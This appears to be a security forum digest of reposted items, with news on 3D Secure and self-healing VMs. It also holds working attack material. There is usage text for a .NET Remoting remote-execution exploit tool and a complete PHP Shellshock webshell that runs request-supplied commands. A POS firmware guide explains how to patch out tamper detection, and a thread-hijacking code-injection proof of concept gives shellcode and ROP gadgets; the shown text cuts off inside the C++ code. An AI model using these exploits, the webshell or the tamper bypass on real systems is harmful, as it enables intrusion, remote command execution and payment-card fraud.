Nytro

[h=1].NET Remoting Services Remote Command Execution[/h] Source: https://github.com/tyranid/ExploitRemotingService Exploit Database Mirror: http://www.exploit-db.com/sploits/35280.zip ExploitRemotingService (c) 2014 James Forshaw ============================================= A tool to exploit .NET Remoting Services vulnerable to CVE-2014-1806 or CVE-2014-4149. It only works on Windows although some aspects _might_ work in Mono on *nix. Usage Instructions: =================== ExploitRemotingService [options] uri command [command args] Copyright (c) James Forshaw 2014 Uri: The supported URI are as follows: tcp://host:port/ObjName - TCP connection on host and portname ipc://channel/ObjName - Named pipe channel Options: -s, --secure Enable secure mode -p, --port=VALUE Specify the local TCP port to listen on -i, --ipc=VALUE Specify listening pipe name for IPC channel --user=VALUE Specify username for secure mode --pass=VALUE Specify password for secure mode --ver=VALUE Specify version number for remote, 2 or 4 --usecom Use DCOM backchannel instead of .NET remoting --remname=VALUE Specify the remote object name to register -v, --verbose Enable verbose debug output --useser Uses old serialization tricks, only works on full type filter services -h, -?, --help Commands: exec [-wait] program [cmdline]: Execute a process on the hosting server cmd cmdline : Execute a command line process and display stdou t put localfile remotefile : Upload a file to the hosting server get remotefile localfile : Download a file from the hosting server ls remotedir : List a remote directory run file [args] : Upload and execute an assembly, calls entry point user : Print the current username ver : Print the OS version This tool supports exploit both TCP remoting services and local IPC services. To test the exploit you need to know the name of the .NET remoting service and the port it's listening on (for TCP) or the name of the Named Pipe (for IPC). You can normally find this in the server or client code. Look for things like calls to: RemotingConfiguration.RegisterWellKnownServiceType or Activator.CreateInstance You can then try the exploit by constructing an appropriate URL. If TCP you can use the URL format tcp://hostname:port/ServiceName. For IPC use ipc://NamedPipeName/ServiceName. A simple test is to do: ExploitRemotingService SERVICEURL ver If successful it should print the OS version of the hosting .NET remoting service. If you get an exception it might be fixed with CVE-2014-1806. At this point try the COM version using: ExploitRemotingService -usecom SERVICEURL ver This works best locally but can work remotely if you modify the COM configuration and disable the firewall you should be able to get it to work. If that still doesn't work then it might be an up to date server. Instead you can also try the full serialization version using. ExploitRemotingService -useser SERVICEURL ls c:\ For this to work the remoting service must be running with full typefilter mode enabled (which is some, especially IPC services). It also only works with the commands ls, put and get. But that should be enough to compromise a box. I've provided an example service to test against. Sursa: http://www.exploit-db.com/exploits/35280/

[h=1]PHP 5.x - Bypass Disable Functions (via Shellshock)[/h] # Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions) # Google Dork: none # Date: 10/31/2014 # Exploit Author: Ryan King (Starfall) # Vendor Homepage: http://php.net # Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror # Version: 5.* (tested on 5.6.2) # Tested on: Debian 7 and CentOS 5 and 6 # CVE: CVE-2014-6271 <?php function shellshock($cmd) { // Execute a command via CVE-2014-6271 @ mail.c:283 if(strstr(readlink("/bin/sh"), "bash") != FALSE) { $tmp = tempnam(".","data"); putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1"); // In Safe Mode, the user may only alter environment variables whose names // begin with the prefixes supplied by this directive. // By default, users will only be able to set environment variables that // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is empty, // PHP will let the user modify ANY environment variable! mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actually send any mail } else return "Not vuln (not bash)"; $output = @file_get_contents($tmp); @unlink($tmp); if($output != "") return $output; else return "No output, or not vuln."; } shellshock($_REQUEST["cmd"]); ?> Sursa: http://www.exploit-db.com/exploits/35146/

[h=1]Visa, MasterCard Removing Passwords from 3D Secure[/h]by Brian Donohue November 17, 2014 , 1:17 pm Payment giants Visa and MasterCard announced plans to eliminate the need for password authentication in the companies’ respective “Verified by Visa” and “SecureCode” payment platforms which are designed to add an additional layer of security to online transactions. In a press release, MasterCard announced that ultimate goal of an upgraded 3D Secure system, set to replace the current system next year, will rely on “richer cardholder data” in order to limit password interruptions in the payment process. In the event that an authentication challenge is required, MasterCard says it plans to replace static, memorized passwords with one-time passwords and fingerprint biometrics. MasterCard is also sponsoring commercial tests to design facial and voice recognition applications for use as authenticators in the future as well as a wristband that authenticates via cardiac rhythm. Threatpost reached out to MasterCard for clarification on what the company means by “richer cardholder data” but did not hear back by the time of publication. 3D Secure is a card-not-present payment protocol developed Visa and adopted by a number of other payment card companies. It was designed to curb the growing problem of fraudulent purchases being made online. When a Verified by Visa or SecureCode user enters her card information to an online merchant, the merchant then sends that payment data to Visa or MasterCard. The payment company replies with an iframe that presents the user with an additional password-based authentication form. If the customer enters the correct password, the merchant receives an authorization code to proceed with the transaction. However, the 3D Secure protocol has been criticized for requiring users to remember yet another complicated password as well as for its user interface, which has been mistaken for a phishing scheme. “All of us want a payment experience that is safe as well as simple, not one or the other,” said Ajay Bhalla, president of enterprise security solutions at MasterCard. “We want to identify people for who they are, not what they remember. We have too many passwords to remember and this creates extra problems for consumers and businesses.” Sursa: Visa, MasterCard Remove Passwords from 3D Secure | Threatpost | The first stop for security news

Scientists develop self-healing virtual machines News Rene Millman Nov 17, 2014 University of Utah creates software that kills off malware in the cloud University of Utah scientists have developed software that can help virtual machines self-heal when under attack from malware. Researchers claim the software not only detects and eradicates never-before-seen viruses and other malware, but also automatically repairs damage caused by them. The software then prevents the invader from infecting the computer again. Dubbed Advanced Adaptive Applications (or A3) the open source software works in a virtual machine, the software monitors the VM’s OS and applications running on Linux. The researchers created “stackable debuggers”; these multiple de-bugging applications run on top of each other and look inside the virtual machine while it is running, constantly monitoring for any out-of-the-ordinary behaviour in the computer. Unlike a normal virus scanner on consumer PCs that compare a list of known viruses to something that has infected the computer, A3 can detect new, unknown viruses or malware automatically by sensing that something is happening in the computer’s operation that is not right. It can then stop the virus, carry out a repair of the damaged software code, and then learn to stop that bug entering the machine again. A3 was co-developed by defence firm Raytheon BBN and was funded by Darpa though its Clean-Slate Design of Resilient, Adaptive, Secure Hosts programme. The four-year project was completed in late September. The software was tested against the recent Shellshock bug. A3 discovered the Shellshock attack on a web server and repaired the damage in four minutes, according to Eric Eide, University of Utah research assistant professor of computer science. “It is a pretty big deal that a computer system could automatically, and in a short amount of time, find an acceptable fix to a widespread and important security vulnerability,” said Eide. “It’s pretty cool when you can pick the Bug of the Week and it works.” Now that the team’s project into A3 is completed and proven to work, Eide said the research team is looking to build on the research and figure out a way to use A3 in cloud computing. If used in a cloud service, such as AWS, that a virus or attack could affect the operation of, A3 could repair it in minutes without having to take the servers down. To find the best business apps for your needs, visit the GetApp store. Sursa: Scientists develop self-healing virtual machines | Cloud Pro

[h=1]Reverse engineering NAND Flash Memory – POS device case study (part 3/3)[/h]Matt_Oh| November 17, 2014 In my first blog, I talked about a method for acquiring a NAND Flash memory image by directly interacting with the chip. After you acquire a raw firmware image, using the various approaches I proposed with my second blog, you should be able to easily identify the layout of the firmware. At this point in the process, it’s time to extract the data and manipulate it. Figure 1 shows a typical firmware image layout. (This is also relevant to the POS device I worked on.) The U-Boot bootloader can be replaced with another bootloader if you like, and the JFFS2 file system can also be replaced with another popular journaling file system. Figure 1 Typical firmware image layout 1st stage bootloader The 1st stage bootloader is usually very architecture-dependent code that performs hardware initialization. The code is automatically loaded at address 0x00000000 by an ARM CPU when it powers up. Figure 2 shows the hardware initialization code from the image I worked on. Figure 2 Hardware initialization code The 1st stage bootloader usually loads up the 2nd stage bootloader – like a U-Boot bootloader for example. This is more of a general purpose bootloader and has more features than the 1st stage bootloader. This 2nd stage bootloader enables user interaction through UART, etc. It can also identify and load the kernel, and various images from various sources - including NAND Flash memory and the network location. Figure 3 Code from U-Boot bootloader U-Boot and U-Boot images The U-Boot bootloader uses U-Boot images to pack the next level OS and recovery file system images. Figure 4 shows the definition of the U-Boot image header. It has a magic value of 4 bytes (27 05 19 56) and a new image always starts with a new block. So identifying U-Boot image is relatively easy. Figure 5 shows a typical U-Boot image header. Figure 4 U-Boot image header Figure 5 U-Boot image example Sometimes, one U-Boot image contains multiple sub-images - Figure 6 shows an example. It contains a Linux kernel image and a Ramdisk image. This is a recovery OS image that is used when the main file system image is damaged or the main kernel doesn’t boot up correctly for some reason. Figure 6 Multi-file image The DumpFlash tool can be used to dump information and extract sub-images from U-Boot images. Figure 7 shows a good example when using the –U option to extract every U-Boot sub-image from the Flash device. Figure 7 DumpFlash.py -U option to extract all sub-images After acquiring the sub-images, depending on the type of the image, you can apply various analysis methods. If the file is a file system image, you can actually mount it on the system and browse the contents. Figure 8 shows an example of mounting an ext2 file system image file extracted from U-Boot image blocks. Figure 8 Mounting RAM disk image Journaling file system Modern embedded systems usually use a journaling file system. This has some advantages over traditional file systems when initial performance is not as good. Usually when the machine starts up, it loads up the whole file system on DRAM first, with modifications to the file system being performed in memory before it is synced to Flash memory. The journaling file system makes it possible to split a file write into small chunks of records, so that it will not re-write the whole file contents when only small parts of it are modified. This is beneficial because reading and writing NAND Flash data is a slow process and excessive writing can diminish the lifespan of a NAND Flash device. Identifying a JFFS2 file system (one of the popular journaling file systems used in the device) is relatively easy. When the JFFS2 software first prepares the NAND Flash device for JFFS2, it leaves a special marker called an erasermaker in the OOB area of the first page of each block. The erasermaker bytes are usually 85 19 03 20 08 00 00 00. (Figure 9) Figure 9 JFFS2 erasermakrer After the JFFS2 file system, investigating the contents is very straightforward. Just by using MTD (Memory Technology Device) in Linux systems, you can directly mount it as a file system. (Figure 10) Figure 10 Mounting JFFS2 image You can then browse the contents using usual Linux commands. (Figure 11) Figure 11 JFFS2 contents Modifying firmware Acquiring firmware in itself is very useful for further analysis and vulnerability research. It is also beneficial if you can modify the firmware and reload it from the machine. This is not quite as easy, but it’s certainly not impossible. The first thing to do is to find the target code to patch. After this you’ll need to fix all related page checksums. For example, the device I worked on has tamper protection. If the device is opened up at least once, it won’t boot up correctly and displays error messages similar to those shown in Figure 12. This is to alert the POS owner if any attempts to modify the device are made. Tamper protection is a big deal with POS devices because they process financial transactions. Obviously, if it is back-doored or tampered with the integrity of the system is lost and it could potentially leak credit and debit card information, such as track 1 and track 2 data. Figure 12 Tamper protection in action When I opened up the device, I saw another very curious device inserted between the front and back panels. This device connects the circuits of the front and back panels. (Figure 13) Figure 13 Front and back panels When I looked closely at the device, it appeared more interesting. (Figure 14) First I thought it was like plastic padding or something, but it actually had circuits inside it. And as I discovered, trying to tamper with this device is not easy. The conducting materials are painted inside the cover and any attempt to tamper with this easily breaks the circuits. So I suspect this device is used for tamper detection. When you open up the device, the current between the back and front panel is broken, and there might be a proprietary chip that detects this. Of course, this is just speculation for now. Figure 14 Circuits inside plastic padding The thing is that I don’t know exactly how tamper detection is performed at the hardware level but it is relatively easy to patch this up in the software level. To circumvent this protection, you need to find the process that actually checks the tamper detection in the device. The process that is responsible for this is the /bin/svcsec program. It is loaded with the rcS script when the system starts up. It uses a proprietary device called /dev/spectrum to retrieve tamper information. The code that is doing the tamper detection is shown in Figure 15 and you can patch the CMP instruction to the CMN instruction to change the control flow. Figure 15 Patching CMP instruction Now that you have a patched binary, you need to write this file into the flat JFFS2 image file. Figure 16 shows this process. DumpJFFS2.py has various command line options. The –t and –s options specify the location and size of the patch location in the file. Here we patched 4 bytes at offset 0x11380 of /bin/svcsec file. It reads the original JFFS2 dump file - named JFFS2-01.dmp - and modifies the affected JFFS2 records, writing the output to the JFFS2-01-Patched.dmp file. Figure 16 DumpJFFS2.py tool to overwrite modified JFFS2 record Figure 17 and Figure 18 show how this command modifies the affected JFFS2 record. The original record has a compressed data size of 0xF4 bytes. If you decompressed this data using the ZLIB library, it would be part of the executable code from /bin/svcsec. The decompressed size is 0x100 bytes. Out of these bytes, we modify only 4 bytes and compress the entire data again, which creates new compressed bytes of 0xEF size. After appending a few 0xFF padding bytes to fill the space between this and next JFFS2 record, the script calculates 3 CRC values – header, data and node - and writes them back to the header. Figure 17 Original JFFS2 record Figure 18 Modified JFFS2 record Now with the patched JFFS2 raw image, you need to flash it back to Flash memory. With the changes made, it affects one page in this case. It doesn’t need to flash whole blocks and pages of the image, it just needs to write back one page. Figure 19 shows the command line options to achieve this. The –OJ option specifies the patched dump file to write back to and the –C option specifies the original JFFS2 dump file. The program compares both images and only writes the modified data. The –b option specifies the range of JFFS2 file system blocks. We already got this information with the DumpFlash.py –j command. You need to erase a block before writing NAND Flash pages – that is how it usually works with Flash memory, so the script will erase the affected block and rewrite the whole block, not just the page. Figure 19 DumpFlash to write affected page Movie 1 shows the process of re-soldering the Flash memory back to the board after modifying the firmware. If this process is successful, you can turn on the device and see it working again with the modified firmware. Movie 1 Re-soldering Flash memory back to the board Conclusion After identifying the layout of the firmware using the various methods I shared last time, you can extract bootloader and file system images. I talked about extracting and modifying U-Boot images and JFFS2 images, which are very popular with embedded systems. Journaling file systems are especially interesting in the way they work and how they are laid out in the image file. Modifying a few bytes in the binary inside the file system involves various levels of modification to the image. First, the whole JFFS2 record that contains the affected bytes needs to be modified. Then the page that contains the specific JFFS2 record needs to be checksumed again. Next you need to write the image back to the physical Flash memory. Finally, you need to re-solder the chip to the board again. I used the example of a POS device. This POS device had tamper protection, but the check for tampering was performed in userland process level, which means that if you can modify the code, the protection is off. So even with very sophisticated hardware devices that detect tampering, a few bytes of code modification nullifies whole physical security concept. Sursa: Reverse engineering NAND Flash Memory – POS device... - HP Enterprise Business Community

[h=3]PoC: Code injection via thread hijacking[/h]by BKsky » Sun Nov 16, 2014 8:46 pm nothing new, it's just a PoC. No NtWriteVirtualMemory, NtMapViewofSection for writing the code. By nature, hijacking threads can have a high level of instability, consider it. Stability and requirements can be improved; it's possible to inject our code without opening a shared section Hit: any process that can keep our code ( somehow ) is useful. code.asm: include masm32rt.inc option casemap:none .data BegMark BYTE 62h, 6Bh, 30h, 30h, 30h, 30h, 30h, 30h, 30h, 30h, 30h, 30h, 30h, 30h, 30h, 30h BYTE 30h, 30h, 30h, 30h, 30h, 30h, 30h, 30h, 30h, 30h, 30h, 30h, 30h, 30h, 30h, 30h BYTE 37h, 46h, 46h, 46h, 46h, 46h, 46h, 46h SizeofBegMark EQU $-BegMark Shellcode db 83h, 0C4h, 0Ch, 8Bh, 85h, 0E8h, 00h, 00h, 00h, 83h, 0ADh, 3Ch, 05h, 00h, 00h, 04h db 8Bh, 09Dh, 3Ch, 05h, 00h, 00h, 89h, 03h, 0E8h, 00h, 00h, 00h, 00h, 5Fh, 81h, 0C7h db 23h, 00h, 00h, 00h, 6Ah, 00h, 6Ah, 00h, 55h, 57h, 6Ah, 00h, 6Ah, 00h, 0FFh, 95h db 0E0h, 00h, 00h, 00h, 09Dh, 58h, 59h, 5Ah, 5Bh, 5Dh, 5Eh, 5Fh, 5Ch, 0C3h, 8Bh, 0FFh db 8Bh, 74h, 24h, 04h, 64h, 8Bh, 3Dh, 18h, 00h, 00h, 00h, 8Bh, 7Fh, 30h, 8Bh, 7Fh db 10h, 0Fh, 0B7h, 47h, 38h, 85h, 0C0h, 74h, 14h, 8Dh, 86h, 96h, 00h, 00h, 00h, 6Ah db 00h, 50h, 0FFh, 77h, 3Ch, 6Ah, 00h, 0FFh, 96h, 0E4h, 00h, 00h, 00h, 0C2h, 04h SizeofShellcode EQU $-Shellcode UCSTR TittleMsg, "Hello World from:",0 UNICODE_STRING STRUCT _Length WORD ? MaximumLength WORD ? Buffer PWSTR ? UNICODE_STRING ENDS LPUNICODE_STRING typedef PTR UNICODE_STRING RTL_DRIVE_LETTER_CURDIR STRUCT Flags WORD ? _Length WORD ? TimeStamp DWORD ? DosPath UNICODE_STRING <> RTL_DRIVE_LETTER_CURDIR ends LPRTL_DRIVE_LETTER_CURDIR typedef ptr RTL_DRIVE_LETTER_CURDIR RTL_USER_PROCESS_PARAMETERS STRUCT MaximumLength DWORD ? _Length DWORD ? Flags DWORD ? DebugFlags DWORD ? ConsoleHandle LPVOID ? ConsoleFlags DWORD ? StandardInput LPVOID ? StandardOutput LPVOID ? StandardError LPVOID ? CurrentDirectoryPath UNICODE_STRING <> Handle HANDLE ? DllPath UNICODE_STRING <> ImagePathName UNICODE_STRING <> ; Full path in DOS-like format to process'es file image. CommandLine UNICODE_STRING <> Environment LPVOID ? StartingX DWORD ? StartingY DWORD ? CountX DWORD ? CountY DWORD ? CountCharsX DWORD ? CountCharsY DWORD ? FillAttribute DWORD ? WindowFlags DWORD ? ShowWindowFlags DWORD ? WindowTitle UNICODE_STRING <> DesktopInfo UNICODE_STRING <> ShellInfo UNICODE_STRING <> RuntimeData UNICODE_STRING <> CurrentDirectores RTL_DRIVE_LETTER_CURDIR <> EnvironmentSize DWORD ? EnvironmentVersion DWORD ? RTL_USER_PROCESS_PARAMETERS ends LPRTL_USER_PROCESS_PARAMETERS typedef ptr RTL_USER_PROCESS_PARAMETERS REMOTE_CODE_STRUCTURE STRUCT DWORD BeginningMark BYTE SizeofBegMark dup (?) Shellcode BYTE SizeofShellcode dup (?) TittleMsgBox WCHAR sizeof TittleMsg dup (?) CreateThread LPVOID ? MessageBoxW LPVOID ? tc_Eip DWORD ? StackSpace DWORD 100h dup (?) RetRmCode0 LPVOID ? lpAddress LPVOID ? dwSize DWORD ? flAllocationType DWORD ? flProtect DWORD ? RetRmCode1 DWORD ? PopEsi LPVOID ? RetRmCode2 DWORD ? PopEcx LPVOID ? RetRmCode3 DWORD ? src LPVOID ? count DWORD ? _Flags DWORD ? _Eax DWORD ? _Ecx DWORD ? _Edx DWORD ? _Ebx DWORD ? _Ebp DWORD ? _Esi DWORD ? _Edi DWORD ? _Esp DWORD ? REMOTE_CODE_STRUCTURE ends LPREMOTE_CODE_STRUCTURE typedef ptr REMOTE_CODE_STRUCTURE s REMOTE_CODE_STRUCTURE <"begin","sh"> .code entry_shellcode: add esp,0ch assume ebp:LPREMOTE_CODE_STRUCTURE mov eax,[ebp].tc_Eip sub [ebp]._Esp,sizeof DWORD mov ebx,[ebp]._Esp mov [ebx],eax call get_eip get_eip: pop edi add edi,new_thread-get_eip push NULL push 0 push ebp push edi push 0 push NULL call [ebp].CreateThread assume ebp:nothing popfd pop eax pop ecx pop edx pop ebx pop ebp pop esi pop edi pop esp ret ALIGN 4 new_thread: assume fs:nothing mov esi,[esp+04h] mov edi,fs:[18h] mov edi,[edi+30h] mov edi,[edi+10h] assume edi:LPRTL_USER_PROCESS_PARAMETERS assume esi:LPREMOTE_CODE_STRUCTURE movzx eax,[edi].ImagePathName._Length test eax,eax je Finish_ lea eax,[esi].TittleMsgBox push MB_OK push eax push [edi].ImagePathName.Buffer push NULL call [esi].MessageBoxW Finish_: ret 04h end entry_shellcode inject.h: #pragma once #include <Windows.h> #include <stdio.h> #include "NtDef.h" // your nt definitions #define PTR_ADD_OFFSET(Pointer,Offset) ((LPVOID)((ULONG_PTR)(Pointer) + (ULONG_PTR)(Offset))) #define PTR_SUB_OFFSET(Pointer,Offset) ((LPVOID)((ULONG_PTR)(Pointer) - (ULONG_PTR)(Offset))) const LPWSTR SharedSections[] = { TEXT("\\BaseNamedObjects\\ShimSharedMemory"), TEXT("\\BaseNamedObjects\\mmGlobalPnpInfo"), TEXT("\\BaseNamedObjects\\__ComCatalogCache__"), TEXT("\\BaseNamedObjects\\windows_ie_global_counters"), TEXT("\\BaseNamedObjects\\SessionImmersiveColorSet"), TEXT("\\BaseNamedObjects\\windows_shell_global_counters"), }; /* 50 PUSH EAX FFD6 CALL ESI */ const BYTE RmCode0[] = { 0x50,0xFF,0xD6 }; /* 5E POP ESI 5B POP EBX C3 RETN */ const BYTE RmCodeEsi[] = { 0x5E,0x5B,0xC3 }; /* 5E POP ESI C3 RETN */ const BYTE RmCode1[] = { 0x5E,0xC3 }; /* 59 POP ECX C3 RETN */ const BYTE RmCode2[] = { 0x59,0xC3 }; /* 50 PUSH EAX 53 PUSH EBX FFD6 CALL ESI */ const BYTE RmCode3[] = { 0x50,0x53,0xFF,0xD6 }; /* 57 PUSH EDI FFD1 CALL ECX */ const BYTE RmCodeEsi2[] = { 0x57,0xFF,0xD1 }; /* 5E POP ESI C2 0C00 RETN 0x04 */ const BYTE RMCodeEcx[] = { 0x5E,0xC2,0x04,0x00 }; const BYTE BegMark[] = { 0x62, 0x6B, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x37, 0x46, 0x46, 0x46, 0x46, 0x46, 0x46, 0x46 }; const BYTE Code[] = { 0x83, 0xC4, 0x0C, 0x8B, 0x85, 0xE8, 0x00, 0x00, 0x00, 0x83, 0xAD, 0x3C, 0x05, 0x00, 0x00, 0x04, 0x8B, 0x9D, 0x3C, 0x05, 0x00, 0x00, 0x89, 0x03, 0xE8, 0x00, 0x00, 0x00, 0x00, 0x5F, 0x81, 0xC7, 0x23, 0x00, 0x00, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x55, 0x57, 0x6A, 0x00, 0x6A, 0x00, 0xFF, 0x95, 0xE0, 0x00, 0x00, 0x00, 0x9D, 0x58, 0x59, 0x5A, 0x5B, 0x5D, 0x5E, 0x5F, 0x5C, 0xC3, 0x8B, 0xFF, 0x8B, 0x74, 0x24, 0x04, 0x64, 0x8B, 0x3D, 0x18, 0x00, 0x00, 0x00, 0x8B, 0x7F, 0x30, 0x8B, 0x7F, 0x10, 0x0F, 0xB7, 0x47, 0x38, 0x85, 0xC0, 0x74, 0x14, 0x8D, 0x86, 0x98, 0x00, 0x00, 0x00, 0x6A, 0x00, 0x50, 0xFF, 0x77, 0x3C, 0x6A, 0x00, 0xFF, 0x96, 0xE4, 0x00, 0x00, 0x00, 0xC2, 0x04 }; const WCHAR MsgTittle[] = TEXT("Hello World from:"); #pragma pack(push,4) typedef struct _REMOTE_CODE_STRUCTURE { BYTE BeginningMark[sizeof(BegMark)]; BYTE Shellcode[sizeof(Code)]; WCHAR TittleMsgBox[sizeof(MsgTittle)]; LPVOID CreateThread; LPVOID MessageBoxW; DWORD tc_Eip; DWORD StackSpace[0x100]; LPVOID RetRmCode0; LPVOID lpAddress; SIZE_T dwSize; DWORD flAllocationType; DWORD flProtect; LPVOID RetRmCode1; LPVOID PopEsi; LPVOID RetRmCode2; LPVOID PopEcx; LPVOID RetRmCode3; LPVOID src; SIZE_T count; DWORD _Flags; DWORD _Eax; DWORD _Ecx; DWORD _Edx; DWORD _Ebx; DWORD _Ebp; DWORD _Esi; DWORD _Edi; DWORD _Esp; }REMOTE_CODE_STRUCTURE,*PREMOTE_CODE_STRUCTURE; #pragma pack(pop) extern "C" { NTSTATUS NTAPI LdrLoadDll(IN PWCHAR PathToFile OPTIONAL,IN ULONG Flags OPTIONAL,IN PUNICODE_STRING ModuleFileName,OUT PHANDLE ModuleHandle); NTSTATUS NTAPI RtlGetVersion(PRTL_OSVERSIONINFOW lpVersionInformation); NTSTATUS NTAPI NtQuerySystemInformation(IN SYSTEM_INFORMATION_CLASS SystemInformationClass,IN OUT PVOID SystemInformation,IN ULONG SystemInformationLength,OUT PULONG ReturnLength OPTIONAL); NTSTATUS NTAPI NtQueryInformationProcess(IN HANDLE ProcessHandle,IN PROCESS_INFORMATION_CLASS ProcessInformationClass,OUT PVOID ProcessInformation,IN ULONG ProcessInformationLength,OUT PULONG ReturnLength); NTSTATUS NTAPI NtOpenThread(OUT PHANDLE ThreadHandle,IN ACCESS_MASK AccessMask,IN POBJECT_ATTRIBUTES ObjectAttributes,IN PCLIENT_ID ClientId); NTSTATUS NTAPI NtSuspendThread(IN HANDLE ThreadHandle,OUT PULONG PreviousSuspendCount OPTIONAL); NTSTATUS NTAPI NtResumeThread(IN HANDLE ThreadHandle,OUT PULONG SuspendCount OPTIONAL); NTSTATUS NTAPI NtUnmapViewOfSection(IN HANDLE ProcessHandle,IN PVOID BaseAddress ); NTSTATUS NTAPI NtQueueApcThread(IN HANDLE ThreadHandle,IN PIO_APC_ROUTINE ApcRoutine,IN PVOID ApcRoutineContext OPTIONAL,IN PIO_STATUS_BLOCK ApcStatusBlock OPTIONAL,IN ULONG ApcReserved OPTIONAL); NTSTATUS NTAPI NtWriteVirtualMemory(IN HANDLE ProcessHandle,IN PVOID BaseAddress,IN PVOID Buffer,IN ULONG NumberOfBytesToWrite,OUT PULONG NumberOfBytesWritten OPTIONAL); NTSTATUS NTAPI NtAllocateVirtualMemory(IN HANDLE ProcessHandle,IN OUT PVOID *BaseAddress,IN ULONG ZeroBits,IN OUT PULONG RegionSize,IN ULONG AllocationType,IN ULONG Protect); NTSTATUS NTAPI NtReadVirtualMemory(IN HANDLE ProcessHandle,IN PVOID BaseAddress,OUT PVOID Buffer,IN SIZE_T NumberOfBytesToRead,OUT PSIZE_T NumberOfBytesRead OPTIONAL); NTSTATUS NTAPI NtFreeVirtualMemory(IN HANDLE ProcessHandle,IN PVOID *BaseAddress,IN OUT PULONG RegionSize,IN ULONG FreeType); NTSTATUS NTAPI NtCreateSection(OUT PHANDLE SectionHandle,IN ACCESS_MASK DesiredAccess,IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,IN PLARGE_INTEGER MaximumSize OPTIONAL,IN ULONG SectionPageProtection OPTIONAL,IN ULONG AllocationAttributes,IN HANDLE FileHandle OPTIONAL); NTSTATUS NTAPI NtMapViewOfSection(IN HANDLE SectionHandle,IN HANDLE ProcessHandle,IN OUT PVOID *BaseAddress OPTIONAL,IN ULONG ZeroBits OPTIONAL,IN ULONG CommitSize,IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,IN OUT PULONG ViewSize,IN SECTION_INHERIT InheritDisposition,IN ULONG AllocationType OPTIONAL,IN ULONG Protect); NTSTATUS NTAPI NtOpenProcess(OUT PHANDLE ProcessHandle,IN ACCESS_MASK AccessMask,IN POBJECT_ATTRIBUTES ObjectAttributes,IN PCLIENT_ID ClientId); NTSTATUS NTAPI NtClose(IN HANDLE ObjectHandle); NTSTATUS NTAPI NtQueryInformationFile(IN HANDLE FileHandle,OUT PIO_STATUS_BLOCK IoStatusBlock,OUT PVOID FileInformation,IN ULONG Length,IN FILE_INFORMATION_CLASS FileInformationClass); LPVOID NTAPI RtlAllocateHeap(IN PVOID HeapHandle,IN ULONG Flags,IN ULONG Size); BOOLEAN NTAPI RtlFreeHeap(IN LPVOID HeapHandle,IN ULONG Flags OPTIONAL,IN PVOID HeapBase); LPVOID NTAPI RtlReAllocateHeap(IN PVOID HeapHandle,IN ULONG Flags,IN PVOID MemoryPointer,IN ULONG Size); VOID NTAPI RtlInitUnicodeString(OUT PUNICODE_STRING DestinationString,IN PCWSTR SourceString OPTIONAL); NTSTATUS NTAPI NtOpenSection(OUT PHANDLE SectionHandle,IN ACCESS_MASK DesiredAccess,IN POBJECT_ATTRIBUTES ObjectAttributes); NTSTATUS NTAPI NtQueryVirtualMemory(IN HANDLE ProcessHandle,IN PVOID BaseAddress,IN MEMORY_INFORMATION_CLASS MemoryInformationClass,OUT PVOID Buffer,IN ULONG Length,OUT PULONG ResultLength OPTIONAL); BOOLEAN NTAPI RtlDosPathNameToNtPathName_U(IN PCWSTR DosPathName OPTIONAL,OUT PUNICODE_STRING NtPathName,OUT PCWSTR* NtFileNamePart OPTIONAL,OUT PRTL_RELATIVE_NAME_U DirectoryInfo OPTIONAL); NTSTATUS NTAPI NtCreateFile(OUT PHANDLE FileHandle,IN ACCESS_MASK DesiredAccess,IN POBJECT_ATTRIBUTES ObjectAttributes,OUT PIO_STATUS_BLOCK IoStatusBlock,IN PLARGE_INTEGER AllocationSize OPTIONAL,IN ULONG FileAttributes,IN ULONG ShareAccess,IN ULONG CreateDisposition,IN ULONG CreateOptions,IN PVOID EaBuffer OPTIONAL,IN ULONG EaLength); NTSTATUS NTAPI NtReadFile(IN HANDLE FileHandle,IN HANDLE Event OPTIONAL,IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,IN PVOID ApcContext OPTIONAL,OUT PIO_STATUS_BLOCK IoStatusBlock,OUT PVOID Buffer,IN ULONG Length,IN PLARGE_INTEGER ByteOffset OPTIONAL,IN PULONG Key OPTIONAL); NTSTATUS NTAPI LdrGetProcedureAddress(IN HMODULE ModuleHandle,IN PANSI_STRING FunctionName OPTIONAL,IN WORD Oridinal OPTIONAL,OUT PVOID *FunctionAddress); NTSTATUS NTAPI NtGetContextThread(IN HANDLE ThreadHandle,OUT PCONTEXT pContext); NTSTATUS NTAPI NtSetContextThread(IN HANDLE ThreadHandle,IN PCONTEXT Context); NTSTATUS NTAPI RtlWow64GetThreadContext(IN HANDLE ThreadHandle,IN OUT PWOW64_CONTEXT ThreadContext); NTSTATUS NTAPI RtlWow64SetThreadContext(IN HANDLE ThreadHandle,IN PWOW64_CONTEXT ThreadContext); NTSTATUS NTAPI NtProtectVirtualMemory(IN HANDLE ProcessHandle,IN OUT PVOID *BaseAddress,IN OUT PULONG NumberOfBytesToProtect,IN ULONG NewAccessProtection,OUT PULONG OldAccessProtection ); NTSTATUS NTAPI NtAlertResumeThread(IN HANDLE ThreadHandle,OUT PULONG SuspendCount); NTSTATUS NTAPI NtOpenThreadToken(IN HANDLE ThreadHandle,IN ACCESS_MASK DesiredAccess,IN BOOLEAN OpenAsSelf,OUT PHANDLE TokenHandle); NTSTATUS NTAPI NtSetInformationThread(IN HANDLE ThreadHandle,IN THREAD_INFORMATION_CLASS ThreadInformationClass,IN PVOID ThreadInformation,IN ULONG ThreadInformationLength); NTSTATUS NTAPI NtOpenDirectoryObject(OUT PHANDLE DirectoryObjectHandle,IN ACCESS_MASK DesiredAccess,IN POBJECT_ATTRIBUTES ObjectAttributes); NTSTATUS NTAPI NtCreateMutant(OUT PHANDLE MutantHandle,IN ACCESS_MASK DesiredAccess,IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,IN BOOLEAN InitialOwner); }; NTSTATUS TCHInjection(IN DWORD PID); inject.cpp: #include 